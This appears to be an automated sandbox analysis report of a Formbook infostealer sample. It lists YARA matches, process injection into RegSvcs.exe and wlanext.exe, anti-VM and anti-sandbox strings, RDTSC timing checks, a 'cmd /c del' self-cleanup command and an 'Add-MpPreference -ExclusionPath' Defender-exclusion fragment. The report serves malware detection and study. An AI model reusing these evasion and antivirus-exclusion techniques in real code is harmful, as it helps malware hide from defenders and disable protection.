Source: 00098765123POIIU.exe, 00000000.00000002.337814717.0000000003261000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe	Binary or memory string: OriginalFilenameApplicationStateDisposition.exeF vs 00098765123POIIU.exe

Source: 00098765123POIIU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: 00098765123POIIU.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@14/8

Source: C:\Users\user\Desktop\00098765123POIIU.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\00098765123POIIU.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Mutant created: \Sessions\1\BaseNamedObjects\niuhQPClXbX

Source: 00098765123POIIU.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\00098765123POIIU.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\00098765123POIIU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: 00098765123POIIU.exe

ReversingLabs: Detection: 25%

Source: C:\Users\user\Desktop\00098765123POIIU.exe

File read: C:\Users\user\Desktop\00098765123POIIU.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\00098765123POIIU.exe 'C:\Users\user\Desktop\00098765123POIIU.exe'
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\00098765123POIIU.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 00098765123POIIU.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 00098765123POIIU.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
Source:	Binary string: RegSvcs.pdb, source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.378316502.000000000109F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdb source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source:	Binary string: RegSvcs.pdb source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00404837 push ebx; retf	3_2_0040483B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C892 pushfd ; retf	3_2_0041C893
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004151E2 push esp; iretd	3_2_004151E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004191B9 push esi; iretd	3_2_004191BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041B3F2 push eax; ret	3_2_0041B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041B3FB push eax; ret	3_2_0041B462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041B3A5 push eax; ret	3_2_0041B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041B45C push eax; ret	3_2_0041B462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C4D4 push esi; ret	3_2_0041C4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00415D14 push ebp; retf	3_2_00415D19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00419F79 push ebp; ret	3_2_00419F7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FFD0D1 push ecx; ret	3_2_00FFD0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0330B3A5 push eax; ret	7_2_0330B3F8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0330B3F2 push eax; ret	7_2_0330B3F8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0330B3FB push eax; ret	7_2_0330B462
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_033091B9 push esi; iretd	7_2_033091BA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_033051E2 push esp; iretd	7_2_033051E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032F4837 push ebx; retf	7_2_032F483B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0330C892 pushfd ; retf	7_2_0330C893
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03309F79 push ebp; ret	7_2_03309F7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03305D14 push ebp; retf	7_2_03305D19
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0330B45C push eax; ret	7_2_0330B462
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0330C4D4 push esi; ret	7_2_0330C4D8

Source: initial sample

Static PE information: section name: .text entropy: 7.9019999335

Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 00098765123POIIU.exe PID: 6396, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000032F85E4 second address: 00000000032F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000032F896E second address: 00000000032F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004088A0 rdtsc

3_2_004088A0

Source: C:\Users\user\Desktop\00098765123POIIU.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6400	Thread sleep time: -103772s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5988	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5776	Thread sleep time: -56000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\00098765123POIIU.exe	Thread delayed: delay time: 103772	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000004.00000000.360318060.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.360281014.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.355275681.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.610911018.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000004.00000000.361375592.0000000008540000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.355275681.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.360281014.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.360318060.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
